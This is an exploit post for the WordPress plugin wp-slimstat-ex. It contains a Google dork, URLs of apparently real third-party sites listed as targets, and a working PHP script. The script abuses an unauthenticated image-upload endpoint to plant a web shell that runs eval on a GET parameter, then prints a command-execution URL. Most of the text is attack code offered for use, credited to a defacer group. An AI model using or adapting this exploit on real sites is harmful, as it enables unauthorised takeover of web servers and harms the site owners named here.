# Exploit Title: WP plugins wp-slimstat-ex execute arbitrary PHP code Exploit # Google Dork: inurl:/wp-content/plugins/wp-slimstat-ex// inurl:wp-content/plugins/wp-slimstat-ex/ # Date: [03-10-2013] # Exploit Author: wantexz # Vendor Homepage:http://wordpress.org/ # Software Link: http://wordpress.org// # Version: [http://wordpress.org/] # Tested on: [wantexz] # CVE : [just fun] # bug tes: http://crystalclearfinances.com/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php # => http://crystalclearfinances.com/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php # => http://yonyon-blog.net/wp-content/plugins/wp-slimstat-ex/lib/ofc//php-ofc-library/ofc_upload_image.php <?php # WP plugins wp-slimstat-ex ~ Exploit # http://indonesiancoder.com/ echo <<<EOT ----------------------------------- / WP plugins wp-slimstat-ex ~ Exploit \ \ Author: wantexz / ----------------------------------- ################################################################################################ # author: wantexz # # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys # all indonesian coder, indonesian defacer, kill-9 ,jatimcom , malangcyber # ################################################################################################ EOT; $options = getopt('u:f:'); if(!isset($options['u'], $options['f'])) die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n -u http://target.com/ The full path to Joomla! -f shell.php The name of the file to create.\n"); $url = $options['u']; $file = $options['f']; $shell = "{$url}/wp-content/plugins/wp-slimstat-ex/lib/ofc//tmp-upload-images/{$file}"; $url = "{$url}/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php?name={$file}"; $data = "<?php eval(\$_GET['cmd']); ?>"; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>